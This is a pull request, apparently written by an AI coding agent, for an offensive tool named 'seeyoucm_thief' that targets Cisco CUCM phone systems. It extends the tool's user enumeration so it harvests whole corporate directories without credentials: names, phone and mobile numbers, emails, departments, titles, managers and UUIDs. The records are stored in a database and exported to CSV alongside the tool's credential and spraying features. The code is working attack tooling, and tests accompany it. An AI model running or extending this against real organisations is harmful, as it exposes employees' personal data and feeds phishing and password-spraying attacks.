### PR TITLE
feat: harvest full UDS corporate directory in --userenum

### DIFF
--- a/README.md
+++ b/README.md
@@ -77,6 +77,8 @@ Extract usernames via CUCM UDS API:
 ./thief.py -H <CUCM Server> --userenum
 ```
 
+`--userenum` also harvests the full corporate directory from `/cucm-uds/users` — names, phone numbers, email, department, title, manager, and the per-user UUID — and stores it in the database (`uds_directory` table). This is the same anonymously-readable data phones use for the Directory button, so it works without credentials. View it later with `--show-db`, and when `--csv FILE` is supplied the directory is written to a companion `FILE-directory.csv` alongside the usernames `outfile`.
+
 ### Authenticated Device Discovery
 
 Authenticate to the UDS API with a single end-user credential, enumerate **all** users from `/cucm-uds/users`, then query each user's associated SEP devices with that one credential. The discovered SEPs are deduped, and every config is downloaded and parsed for credentials:
@@ -182,7 +184,7 @@ Export to CSV:
 ### Attack Options
 - `-b, --brute-mac`: Brute force MAC variations (4,096 combinations per phone). If no `-p` phones are given, reuses MAC prefixes discovered on a previous scan from the database (unless `--no-db`)
 - `--force`: Bypass cache and force re-download of all configuration files
-- `--userenum`: Extract usernames via CUCM User Data Services (UDS) API (paginates the full directory)
+- `--userenum`: Extract usernames via CUCM User Data Services (UDS) API (paginates the full directory) and harvest the full directory records (names, phone numbers, email, department, title, manager, UUID) into the `uds_directory` table; with `--csv FILE` also writes a companion `FILE-directory.csv`
 - `--servers`: Enumerate CUCM cluster members (hostnames + IPs) via UDS `/cucm-uds/servers` — requires `-H`
 - `--http`: Use HTTP (port 6970) as the primary config download protocol with TFTP fallback (default: TFTP first, HTTP fallback)
 - `--uds-port PORT`: Override the CUCM UDS API HTTPS port for `--userenum` (default: 8443)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -583,6 +583,61 @@ def get_users_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
     return users
 
 
+# Maps uds_directory dict keys -> the UDS <element> name inside a <user> block.
+_UDS_DIRECTORY_FIELDS = (
+    ('first_name', 'firstName'),
+    ('middle_name', 'middleName'),
+    ('last_name', 'lastName'),
+    ('display_name', 'displayName'),
+    ('phone_number', 'phoneNumber'),
+    ('home_number', 'homeNumber'),
+    ('mobile_number', 'mobileNumber'),
+    ('email', 'email'),
+    ('ms_uri', 'msUri'),
+    ('department', 'department'),
+    ('title', 'title'),
+    ('manager', 'manager'),
+    ('user_id', 'id'),
+)
+
+
+def parse_uds_directory(xml_body):
+    """Return a list of dicts, one per <user> block in a /cucm-uds/users page.
+
+    Keys: username, first_name, middle_name, last_name, display_name,
+    phone_number, home_number, mobile_number, email, ms_uri, department, title,
+    manager, user_id. Missing fields are '' (empty string). A <user> with no
+    <userName> is skipped."""
+    records = []
+    for block in re.findall(r'<user\b[^>]*>(.*?)</user>', xml_body, re.DOTALL):
+        name_match = re.search(r'<userName>([^<]+)</userName>', block)
+        if not name_match:
+            continue
+        record = {'username': name_match.group(1).strip()}
+        for key, tag in _UDS_DIRECTORY_FIELDS:
+            m = re.search(rf'<{tag}>([^<]*)</{tag}>', block)
+            record[key] = m.group(1).strip() if m else ''
+        records.append(record)
+    return records
+
+
+def get_user_directory_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
+    """Full corporate-directory records from /cucm-uds/users via the shared page
+    iterator. Returns a list of dicts (see parse_uds_directory)."""
+    if _TEST_MODE:
+        return [
+            {'username': 'testuser1', 'first_name': 'Test', 'middle_name': '',
+             'last_name': 'One', 'display_name': 'Test One', 'phone_number': '1001',
+             'home_number': '', 'mobile_number': '', 'email': 'testuser1@corp.test',
+             'ms_uri': '', 'department': 'IT', 'title': '', 'manager': '',
+             'user_id': 'uuid-testuser1'},
+        ]
+    records = []
+    for body in _iter_uds_user_pages(cucm_host, port, timeout, max_pages):
+        records.extend(parse_uds_directory(body))
+    return records
+
+
 def get_servers_api(cucm_host, port=UDS_PORT, timeout=10):
     if _TEST_MODE:
         return [{'hostName': 'cucm-pub.test', 'ipv4Address': '10.0.0.1', 'serverType': 'Publisher'}]

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -1538,10 +1538,34 @@ def search_for_secrets(CUCM_host, filename, use_tftp=True):
                 print('Username and password not set in {0}'.format(filename))
     return credentials, usernames
 
+_DIRECTORY_CSV_COLUMNS = (
+    'username', 'first_name', 'last_name', 'display_name', 'phone_number',
+    'home_number', 'mobile_number', 'email', 'ms_uri', 'department', 'title',
+    'manager', 'user_id',
+)
+
+
+def _directory_csv_name(base_filename):
+    """Derive the companion directory-CSV filename: insert '-directory' before
+    the extension (or append it when there is none)."""
+    root, ext = os.path.splitext(base_filename)
+    return f'{root}-directory{ext}'
+
+
+def export_directory_to_csv(records, filename):
+    """Write harvested UDS directory records to a CSV with a fixed column order
+    (see _DIRECTORY_CSV_COLUMNS). One row per record."""
+    with open(filename, 'w', newline='') as f:
+        writer = csv.writer(f)
+        writer.writerow(_DIRECTORY_CSV_COLUMNS)
+        for r in records:
+            writer.writerow([r.get(col, '') for col in _DIRECTORY_CSV_COLUMNS])
+
+
 def export_to_csv(credentials, usernames, filename='seeyoucm_results.csv'):
     """
     Export discovered credentials and usernames to CSV file
-    
+
     Args:
         credentials: List of tuples (username, password, device)
         usernames: List of tuples (username, device)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -515,16 +515,17 @@ def get_config_names(cucm_host, hostnames=None, use_tftp=True):
     return filenames
 
 
-def get_users_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
-    if _TEST_MODE:
-        return ['testuser1', 'testuser2']
-
+def _iter_uds_user_pages(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
+    """Yield each /cucm-uds/users page's response body text, following UDS
+    pagination. Shared by get_users_api and get_user_directory_api so the
+    page-walking logic lives in one place. Pagination 'item count' is measured by
+    <userName> occurrences (UDS paginates per user)."""
     base = f'https://{cucm_host}:{port}/cucm-uds/users'
-    users = []
     seen_urls = set()
     next_url = base
     pages = 0
     total = None
+    collected = 0
 
     while next_url and pages < max_pages:
         if next_url in seen_urls:
@@ -544,12 +545,14 @@ def get_users_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
             dbg(f'UDS non-200 body (first 300 chars): {resp.text[:300]!r}')
             break
 
-        page_users = re.findall(r'<userName>([^<]+)</userName>', resp.text)
-        dbg(f'UDS page {pages} parsed {len(page_users)} userName entries')
-        if not page_users:
+        page_count = len(re.findall(r'<userName>([^<]+)</userName>', resp.text))
+        dbg(f'UDS page {pages} parsed {page_count} userName entries')
+        if page_count == 0:
             dbg(f'UDS empty page body (first 300 chars): {resp.text[:300]!r}')
             break
-        users.extend(page_users)
+
+        yield resp.text
+        collected += page_count
 
         if total is None:
             total_match = re.search(r'<users\b[^>]*\btotalCount="(\d+)"', resp.text) \
@@ -558,17 +561,25 @@ def get_users_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
                 total = int(total_match.group(1))
                 dbg(f'UDS server reports totalCount={total}')
 
-        if total is not None and len(users) >= total:
+        if total is not None and collected >= total:
             break
 
-        next_url = _uds_next_link(resp.text, base, len(users) + 1)
+        next_url = _uds_next_link(resp.text, base, collected + 1)
         if not next_url:
             dbg('UDS no next-page link found; stopping pagination')
             break
 
-    dbg(f'UDS total users collected: {len(users)} across {pages} page(s)')
-    if total is not None and len(users) < total:
-        print(f'[!] UDS reports {total} total users but only {len(users)} were retrieved.')
+    dbg(f'UDS total users collected: {collected} across {pages} page(s)')
+    if total is not None and collected < total:
+        print(f'[!] UDS reports {total} total users but only {collected} were retrieved.')
+
+
+def get_users_api(cucm_host, port=UDS_PORT, timeout=10, max_pages=10000):
+    if _TEST_MODE:
+        return ['testuser1', 'testuser2']
+    users = []
+    for body in _iter_uds_user_pages(cucm_host, port, timeout, max_pages):
+        users.extend(re.findall(r'<userName>([^<]+)</userName>', body))
     return users
 
 

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -736,6 +736,61 @@ def record_uds_users(cucm_host, usernames, db_file='thief.db'):
         return 0
 
 
+def record_uds_directory(cucm_host, records, db_file='thief.db'):
+    """
+    Upsert harvested UDS directory records into the uds_directory table.
+
+    Each record is the dict shape produced by parse_uds_directory. On conflict
+    (same cucm_host + username), refreshes all field columns and last_seen but
+    preserves first_seen. Returns the number of rows inserted/updated.
+    """
+    try:
+        conn = sqlite3.connect(db_file, timeout=30.0)
+        cursor = conn.cursor()
+        timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
+        written = 0
+        for r in records:
+            cursor.execute('''
+                INSERT INTO uds_directory
+                    (cucm_host, username, first_name, middle_name, last_name,
+                     display_name, phone_number, home_number, mobile_number,
+                     email, ms_uri, department, title, manager, user_id,
+                     first_seen, last_seen)
+                VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
+                ON CONFLICT(cucm_host, username) DO UPDATE SET
+                    first_name=excluded.first_name,
+                    middle_name=excluded.middle_name,
+                    last_name=excluded.last_name,
+                    display_name=excluded.display_name,
+                    phone_number=excluded.phone_number,
+                    home_number=excluded.home_number,
+                    mobile_number=excluded.mobile_number,
+                    email=excluded.email,
+                    ms_uri=excluded.ms_uri,
+                    department=excluded.department,
+                    title=excluded.title,
+                    manager=excluded.manager,
+                    user_id=excluded.user_id,
+                    last_seen=excluded.last_seen
+            ''', (
+                cucm_host, r.get('username', ''), r.get('first_name', ''),
+                r.get('middle_name', ''), r.get('last_name', ''),
+                r.get('display_name', ''), r.get('phone_number', ''),
+                r.get('home_number', ''), r.get('mobile_number', ''),
+                r.get('email', ''), r.get('ms_uri', ''), r.get('department', ''),
+                r.get('title', ''), r.get('manager', ''), r.get('user_id', ''),
+                timestamp, timestamp,
+            ))
+            written += 1
+        conn.commit()
+        conn.close()
+        return written
+    except Exception as e:
+        if globals().get('debug', False):
+            print(f'[!] record_uds_directory error: {e}')
+        return 0
+
+
 def log_spray_attempt(cucm_host, username, password, status_code, error, db_file='thief.db'):
     """
     Append a row to spray_attempts. Retries with exponential backoff on
@@ -1633,6 +1688,31 @@ def init_database(db_file='thief.db'):
             id INTEGER PRIMARY KEY AUTOINCREMENT,
             cucm_host TEXT NOT NULL,
             username TEXT NOT NULL,
+            first_seen TEXT NOT NULL,
+            last_seen TEXT NOT NULL,
+            UNIQUE(cucm_host, username)
+        )
+    ''')
+
+    # Create table for the full UDS corporate-directory harvest (--userenum)
+    cursor.execute('''
+        CREATE TABLE IF NOT EXISTS uds_directory (
+            id INTEGER PRIMARY KEY AUTOINCREMENT,
+            cucm_host TEXT NOT NULL,
+            username TEXT NOT NULL,
+            first_name TEXT,
+            middle_name TEXT,
+            last_name TEXT,
+            display_name TEXT,
+            phone_number TEXT,
+            home_number TEXT,
+            mobile_number TEXT,
+            email TEXT,
+            ms_uri TEXT,
+            department TEXT,
+            title TEXT,
+            manager TEXT,
+            user_id TEXT,
             first_seen TEXT NOT NULL,
             last_seen TEXT NOT NULL,
             UNIQUE(cucm_host, username)

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -2862,6 +2862,16 @@ def main():
             if debug:
                 for username in unique_users:
                     print(f'{username}')
+            directory = get_user_directory_api(CUCM_host, port=args.uds_port)
+            if directory:
+                if not no_db:
+                    written = record_uds_directory(CUCM_host, directory, db_file)
+                    print(f'[+] Harvested directory records for {written} user(s)')
+                if csv_output:
+                    base_csv = csv_output if csv_output is not True else 'seeyoucm_results.csv'
+                    dir_csv = _directory_csv_name(base_csv)
+                    export_directory_to_csv(directory, dir_csv)
+                    print(f'[+] Directory exported to CSV: {dir_csv}')
             if not no_db:
                 print(f'[*] Probing UDS for associated devices (unauthenticated)...')
                 found = enumerate_devices_unauthenticated(

--- a/src/seeyoucm_thief/thief.py
+++ b/src/seeyoucm_thief/thief.py
@@ -2211,6 +2211,28 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             else:
                 raise
 
+        uds_directory = []
+        try:
+            if cucm_filter:
+                cursor.execute('''
+                    SELECT username, display_name, first_name, last_name,
+                           phone_number, email, department
+                      FROM uds_directory WHERE cucm_host = ?
+                     ORDER BY username
+                ''', (cucm_filter,))
+            else:
+                cursor.execute('''
+                    SELECT username, display_name, first_name, last_name,
+                           phone_number, email, department
+                      FROM uds_directory ORDER BY username
+                ''')
+            uds_directory = cursor.fetchall()
+        except sqlite3.OperationalError as e:
+            if 'no such table' in str(e):
+                uds_directory = []
+            else:
+                raise
+
         # Get download stats (handle missing table gracefully)
         total_attempts = 0
         successful_downloads = 0
@@ -2238,7 +2260,7 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
 
         conn.close()
         
-        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers and not spray_hits and not uds_devices and not verified_admins:
+        if not credentials and not usernames and not mac_prefixes and not phone_cucm and not cluster_servers and not spray_hits and not uds_devices and not uds_directory and not verified_admins:
             print(f'\n[-] No data found in database')
             if cucm_filter:
                 print(f'[-] Filter: CUCM host = {cucm_filter}')
@@ -2358,6 +2380,15 @@ def display_database_summary(db_file='thief.db', cucm_filter=None):
             print("-"*70)
             for cucm_host_row, username, device_name, source, ts in uds_devices:
                 print(f'{username:<24} {device_name:<20} {source:<12} {cucm_host_row}')
+
+        if uds_directory:
+            print(f'\n\033[1m[+] UDS Directory ({len(uds_directory)} total)\033[0m')
+            print("-"*70)
+            print(f'{"Username":<20} {"Name":<22} {"Phone":<10} {"Email":<26} {"Dept"}')
+            print("-"*70)
+            for username, display_name, first_name, last_name, phone_number, email, department in uds_directory:
+                name = display_name or ' '.join(p for p in (first_name, last_name) if p)
+                print(f'{username:<20} {name:<22} {phone_number:<10} {email:<26} {department}')
 
         print(f'\n{"="*70}')
         print(f'\n\033[1mDATABASE STATISTICS:\033[0m')
@@ -2682,6 +2713,24 @@ def main():
                 cred_rows = [(c[2], c[3], c[1]) for c in credentials]  # (username, password, device)
                 export_to_csv(cred_rows, [], csv_filename)
                 print(f'[+] Exported credentials (with passwords) to CSV: {csv_filename}')
+                # Companion directory CSV (separate from the credentials export)
+                try:
+                    conn = sqlite3.connect(db_file)
+                    cur = conn.cursor()
+                    if cucm_filter:
+                        cur.execute('SELECT username, first_name, last_name, display_name, phone_number, home_number, mobile_number, email, ms_uri, department, title, manager, user_id FROM uds_directory WHERE cucm_host = ? ORDER BY username', (cucm_filter,))
+                    else:
+                        cur.execute('SELECT username, first_name, last_name, display_name, phone_number, home_number, mobile_number, email, ms_uri, department, title, manager, user_id FROM uds_directory ORDER BY username')
+                    dir_rows = cur.fetchall()
+                    conn.close()
+                    if dir_rows:
+                        dir_records = [dict(zip(_DIRECTORY_CSV_COLUMNS, row)) for row in dir_rows]
+                        dir_csv = _directory_csv_name(csv_filename)
+                        export_directory_to_csv(dir_records, dir_csv)
+                        print(f'[+] Exported UDS directory to CSV: {dir_csv}')
+                except sqlite3.OperationalError as e:
+                    if 'no such table' not in str(e):
+                        raise
             except Exception as e:
                 print(f'[-] Error exporting credentials to CSV: {e}')
         display_database_summary(db_file, cucm_filter)

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -563,3 +563,23 @@ def test_export_directory_to_csv_writes_header_and_rows(tmp_path):
                         "manager,user_id")
     assert lines[1].startswith("alice,Alice,Smith,Alice Smith,1001,")
     assert "alice@corp.example" in lines[1]
+
+
+def test_show_db_displays_uds_directory(db_path, capsys):
+    recs = [{'username': 'alice', 'first_name': 'Alice', 'middle_name': '',
+             'last_name': 'Smith', 'display_name': 'Alice Smith',
+             'phone_number': '1001', 'home_number': '', 'mobile_number': '',
+             'email': 'alice@corp.example', 'ms_uri': '', 'department': 'Finance',
+             'title': 'Analyst', 'manager': 'bob', 'user_id': 'uuid-alice'}]
+    thief.record_uds_directory("cucm.example.com", recs, db_path)
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "UDS Directory" in out
+    assert "alice" in out
+    assert "alice@corp.example" in out
+
+
+def test_show_db_omits_uds_directory_when_empty(db_path, capsys):
+    thief.display_database_summary(db_path)
+    out = capsys.readouterr().out
+    assert "UDS Directory" not in out

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -536,3 +536,30 @@ def test_record_uds_directory_upserts_without_duplicates(db_path):
     rows = _rows(db_path, "SELECT COUNT(*), MAX(email) FROM uds_directory WHERE username='alice'")
     assert rows[0][0] == 1
     assert rows[0][1] == "new@corp.example"
+
+
+# ---------------------------------------------------------------------------
+# directory CSV export
+# ---------------------------------------------------------------------------
+
+def test_directory_csv_name_derives_companion_name():
+    assert thief._directory_csv_name("results.csv") == "results-directory.csv"
+    assert thief._directory_csv_name("results") == "results-directory"
+    assert thief._directory_csv_name("/tmp/out.csv") == "/tmp/out-directory.csv"
+
+
+def test_export_directory_to_csv_writes_header_and_rows(tmp_path):
+    recs = [{'username': 'alice', 'first_name': 'Alice', 'middle_name': '',
+             'last_name': 'Smith', 'display_name': 'Alice Smith',
+             'phone_number': '1001', 'home_number': '', 'mobile_number': '',
+             'email': 'alice@corp.example', 'ms_uri': '', 'department': 'Finance',
+             'title': 'Analyst', 'manager': 'bob', 'user_id': 'uuid-alice'}]
+    out = tmp_path / "dir.csv"
+    thief.export_directory_to_csv(recs, str(out))
+    text = out.read_text()
+    lines = text.strip().splitlines()
+    assert lines[0] == ("username,first_name,last_name,display_name,phone_number,"
+                        "home_number,mobile_number,email,ms_uri,department,title,"
+                        "manager,user_id")
+    assert lines[1].startswith("alice,Alice,Smith,Alice Smith,1001,")
+    assert "alice@corp.example" in lines[1]

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -497,3 +497,42 @@ def test_get_user_directory_api_assembles_records_across_pages():
     assert [r["username"] for r in records] == ["alice", "bob"]
     assert records[0]["email"] == "alice@corp.example"
     assert records[1]["department"] == "IT"
+
+
+# ---------------------------------------------------------------------------
+# uds_directory table + record_uds_directory
+# ---------------------------------------------------------------------------
+
+def test_init_database_creates_uds_directory_table(db_path):
+    import sqlite3 as _sq
+    conn = _sq.connect(db_path)
+    cols = {row[1] for row in conn.execute("PRAGMA table_info(uds_directory)").fetchall()}
+    conn.close()
+    assert {"cucm_host", "username", "first_name", "last_name", "display_name",
+            "phone_number", "email", "department", "title", "manager", "user_id",
+            "first_seen", "last_seen"} <= cols
+
+
+def test_record_uds_directory_inserts_rows(db_path):
+    recs = [{'username': 'alice', 'first_name': 'Alice', 'middle_name': '',
+             'last_name': 'Smith', 'display_name': 'Alice Smith',
+             'phone_number': '1001', 'home_number': '', 'mobile_number': '',
+             'email': 'alice@corp.example', 'ms_uri': '', 'department': 'Finance',
+             'title': 'Analyst', 'manager': 'bob', 'user_id': 'uuid-alice'}]
+    thief.record_uds_directory("cucm.example.com", recs, db_path)
+    rows = _rows(db_path, "SELECT username, email, department FROM uds_directory")
+    assert rows == [("alice", "alice@corp.example", "Finance")]
+
+
+def test_record_uds_directory_upserts_without_duplicates(db_path):
+    rec = {'username': 'alice', 'first_name': 'Alice', 'middle_name': '',
+           'last_name': 'Smith', 'display_name': '', 'phone_number': '1001',
+           'home_number': '', 'mobile_number': '', 'email': 'old@corp.example',
+           'ms_uri': '', 'department': '', 'title': '', 'manager': '',
+           'user_id': 'uuid-alice'}
+    thief.record_uds_directory("cucm.example.com", [rec], db_path)
+    rec2 = dict(rec, email="new@corp.example")
+    thief.record_uds_directory("cucm.example.com", [rec2], db_path)
+    rows = _rows(db_path, "SELECT COUNT(*), MAX(email) FROM uds_directory WHERE username='alice'")
+    assert rows[0][0] == 1
+    assert rows[0][1] == "new@corp.example"

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -425,3 +425,75 @@ def test_iter_uds_user_pages_yields_each_page_body():
     with patch.object(thief.requests, 'get', side_effect=side_effect):
         bodies = list(thief._iter_uds_user_pages("cucm.example.com", 8443))
     assert bodies == [page1, page2]
+
+
+# ---------------------------------------------------------------------------
+# parse_uds_directory
+# ---------------------------------------------------------------------------
+
+UDS_DIRECTORY_XML = """<?xml version="1.0" encoding="UTF-8"?>
+<users totalCount="2">
+  <user>
+    <id>uuid-alice</id>
+    <userName>alice</userName>
+    <firstName>Alice</firstName>
+    <lastName>Smith</lastName>
+    <displayName>Alice Smith</displayName>
+    <phoneNumber>1001</phoneNumber>
+    <email>alice@corp.example</email>
+    <department>Finance</department>
+    <title>Analyst</title>
+    <manager>bob</manager>
+  </user>
+  <user>
+    <id>uuid-bob</id>
+    <userName>bob</userName>
+    <firstName>Bob</firstName>
+  </user>
+</users>"""
+
+
+def test_parse_uds_directory_extracts_all_fields():
+    records = thief.parse_uds_directory(UDS_DIRECTORY_XML)
+    assert records[0] == {
+        "username": "alice", "first_name": "Alice", "middle_name": "",
+        "last_name": "Smith", "display_name": "Alice Smith",
+        "phone_number": "1001", "home_number": "", "mobile_number": "",
+        "email": "alice@corp.example", "ms_uri": "", "department": "Finance",
+        "title": "Analyst", "manager": "bob", "user_id": "uuid-alice",
+    }
+
+
+def test_parse_uds_directory_missing_fields_are_empty():
+    records = thief.parse_uds_directory(UDS_DIRECTORY_XML)
+    assert records[1]["username"] == "bob"
+    assert records[1]["first_name"] == "Bob"
+    assert records[1]["last_name"] == ""
+    assert records[1]["email"] == ""
+
+
+def test_parse_uds_directory_skips_user_without_username():
+    xml = "<users><user><firstName>NoName</firstName></user></users>"
+    assert thief.parse_uds_directory(xml) == []
+
+
+def test_parse_uds_directory_empty_body():
+    assert thief.parse_uds_directory("") == []
+
+
+def test_get_user_directory_api_assembles_records_across_pages():
+    page1 = ('<users totalCount="2"><user><userName>alice</userName>'
+             '<email>alice@corp.example</email></user></users>')
+    page2 = ('<users totalCount="2"><user><userName>bob</userName>'
+             '<department>IT</department></user></users>')
+    responses = [MagicMock(status_code=200, text=page1),
+                 MagicMock(status_code=200, text=page2)]
+
+    def side_effect(url, **kwargs):
+        return responses.pop(0)
+
+    with patch.object(thief.requests, 'get', side_effect=side_effect):
+        records = thief.get_user_directory_api("cucm.example.com", port=8443)
+    assert [r["username"] for r in records] == ["alice", "bob"]
+    assert records[0]["email"] == "alice@corp.example"
+    assert records[1]["department"] == "IT"

--- a/tests/test_uds_devices.py
+++ b/tests/test_uds_devices.py
@@ -407,3 +407,21 @@ def test_enumerate_devices_authenticated_ok_with_no_devices_counts_ok_only(db_pa
     )
     assert result["ok"] == 1
     assert result["devices"] == {}
+
+
+# ---------------------------------------------------------------------------
+# _iter_uds_user_pages (shared pagination)
+# ---------------------------------------------------------------------------
+
+def test_iter_uds_user_pages_yields_each_page_body():
+    page1 = '<users totalCount="3"><user><userName>a</userName></user><user><userName>b</userName></user></users>'
+    page2 = '<users totalCount="3"><user><userName>c</userName></user></users>'
+    responses = [MagicMock(status_code=200, text=page1),
+                 MagicMock(status_code=200, text=page2)]
+
+    def side_effect(url, **kwargs):
+        return responses.pop(0)
+
+    with patch.object(thief.requests, 'get', side_effect=side_effect):
+        bodies = list(thief._iter_uds_user_pages("cucm.example.com", 8443))
+    assert bodies == [page1, page2]


### PR DESCRIPTION
## Summary
- `--userenum` now harvests the **full** corporate directory from `/cucm-uds/users` (anonymously readable), not just usernames: names, phone numbers, email, department, title, manager, and the per-user UUID.
- Stored in a new `uds_directory` table (upsert per `(cucm_host, username)`), shown in `--show-db`, and exported to a companion `FILE-directory.csv` when `--csv FILE` is given (separate from the credentials CSV).
- Pagination was refactored into a shared `_iter_uds_user_pages` generator so the new structured `get_user_directory_api` reuses it; **`get_users_api` keeps its exact username-list contract** (spray and the device sweep are unaffected).

## Implementation
- `_iter_uds_user_pages` (shared pagination) + thin `get_users_api`
- `parse_uds_directory` (full per-`<user>` record parser) + `get_user_directory_api`
- `uds_directory` table + `record_uds_directory` upsert
- `export_directory_to_csv` + `_directory_csv_name` companion-file helper
- `--userenum` harvest wiring; `--show-db` directory section + `--show-db --csv` companion export

## Test Plan
- [x] parser: all-fields, missing-fields→'', skip user w/o username, empty body
- [x] `get_user_directory_api` assembles records across paginated pages
- [x] `record_uds_directory` insert + upsert (no dupes, fields refreshed)
- [x] `export_directory_to_csv` header/rows; companion-name helper
- [x] `--show-db` directory section present/absent
- [x] `get_users_api` parity preserved (existing suite unchanged)
- [x] full suite: 226 passed, 2 skipped

🤖 Generated with [Claude Code](https://claude.com/claude-code)